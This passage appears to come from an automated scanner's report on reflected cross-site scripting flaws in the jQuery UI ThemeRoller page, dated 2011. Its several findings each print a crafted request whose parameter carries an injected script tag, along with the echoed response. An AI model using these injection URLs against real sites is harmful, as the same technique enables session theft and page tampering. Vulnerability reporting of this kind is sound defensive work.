Date: Mon, 18 Jul 2011 02:17:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120039

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75e5bb4"><script>alert(1)</script>9e07f5d558&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22
...[SNIP]...

3.59. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied, without HTML encoding, into a double-quoted HTML attribute value. The payload 6ffee"><script>alert(1)</script>0861f63f7bc was submitted in the bgImgOpacityHighlight parameter and was echoed unmodified in the response. The "> prefix closes the attribute value and its tag, so the <script> element that follows is parsed as markup.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response via a crafted /themeroller/ URL.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=556ffee"><script>alert(1)</script>0861f63f7bc&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=556ffee"><script>alert(1)</script>0861f63f7bc&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a
...[SNIP]...

3.60. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied, without HTML encoding, into a double-quoted HTML attribute value. The payload 59604"><script>alert(1)</script>34ad975ff8c was submitted in the bgImgOpacityHover parameter and was echoed unmodified in the response. The "> prefix closes the attribute value and its tag, so the <script> element that follows is parsed as markup.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response via a crafted /themeroller/ URL.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7559604"><script>alert(1)</script>34ad975ff8c&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7559604"><script>alert(1)</script>34ad975ff8c&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgC
...[SNIP]...

3.61. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied, without HTML encoding, into a double-quoted HTML attribute value. The payload cf027"><script>alert(1)</script>1e9050619f4 was submitted in the bgImgOpacityOverlay parameter and was echoed unmodified; the Response excerpt shows the attribute's own closing quote followed by a type attribute, confirming the double-quoted attribute context. The "> prefix closes the attribute value and its tag early, so the <script> element that follows is parsed as markup.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response via a crafted /themeroller/ URL.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0cf027"><script>alert(1)</script>1e9050619f4&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0cf027"><script>alert(1)</script>1e9050619f4&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

3.62. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied, without HTML encoding, into a double-quoted HTML attribute value. The payload 994f3"><script>alert(1)</script>03809dbf2df was submitted in the bgImgOpacityShadow parameter and was echoed unmodified; the Response excerpt shows the attribute closing with " type="text/css" media="all" />, so the attribute is the URL of a stylesheet reference. The "> prefix closes that URL and its tag early, and the <script> element that follows is parsed as markup.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response via a crafted /themeroller/ URL.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0994f3"><script>alert(1)</script>03809dbf2df&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0994f3"><script>alert(1)</script>03809dbf2df&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.63. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied, without HTML encoding, into a double-quoted HTML attribute value. The payload 882e1"><script>alert(1)</script>07149fc06f1 was submitted in the bgTextureActive parameter, appended to the expected texture file name 02_glass.png, and was echoed unmodified in the response. The "> prefix closes the attribute value and its tag, so the <script> element that follows is parsed as markup. A file-name allow-list for the bgTexture* parameters would have rejected this value outright.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response via a crafted /themeroller/ URL.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png882e1"><script>alert(1)</script>07149fc06f1&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
onColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png882e1"><script>alert(1)</script>07149fc06f1&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHig
...[SNIP]...

3.64. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied, without HTML encoding, into a double-quoted HTML attribute value. The payload 5322d"><script>alert(1)</script>f5d91b6353c was submitted in the bgTextureContent parameter, appended to the expected texture file name 01_flat.png, and was echoed unmodified in the response. The "> prefix closes the attribute value and its tag, so the <script> element that follows is parsed as markup.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response via a crafted /themeroller/ URL.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png5322d"><script>alert(1)</script>f5d91b6353c&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png5322d"><script>alert(1)</script>f5d91b6353c&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault
...[SNIP]...

3.65. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied, without HTML encoding, into a double-quoted HTML attribute value. The payload 537a5"><script>alert(1)</script>3b59a1d1c81 was submitted in the bgTextureDefault parameter, appended to the expected texture file name 02_glass.png, and was echoed unmodified in the response. The "> prefix closes the attribute value and its tag, so the <script> element that follows is parsed as markup.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response via a crafted /themeroller/ URL.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png537a5"><script>alert(1)</script>3b59a1d1c81&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png537a5"><script>alert(1)</script>3b59a1d1c81&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&ic
...[SNIP]...

3.66. http://jqueryui.com/themeroller/ [bgTextureError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied, without HTML encoding, into a double-quoted HTML attribute value. The payload ffe15"><script>alert(1)</script>b095b5c9bc8 was submitted in the bgTextureError parameter, appended to the expected texture file name 02_glass.png, and was echoed unmodified in the response. The "> prefix closes the attribute value and its tag, so the <script> element that follows is parsed as markup.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response via a crafted /themeroller/ URL.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngffe15"><script>alert(1)</script>b095b5c9bc8&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngffe15"><script>alert(1)</script>b095b5c9bc8&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

3.67. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied, without HTML encoding, into a double-quoted HTML attribute value. The payload 8bee3"><script>alert(1)</script>07f42324772 was submitted in the bgTextureHeader parameter, appended to the expected texture file name 03_highlight_soft.png, and was echoed unmodified; the Response excerpt shows it inside href="/themeroller/css/parseTheme.css.php?ctl=themeroller&..., i.e. the href of the element that loads the generated theme stylesheet. The "> prefix closes that href and its tag early, and the <script> element that follows is parsed as markup.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response via a crafted /themeroller/ URL.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png8bee3"><script>alert(1)</script>07f42324772&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

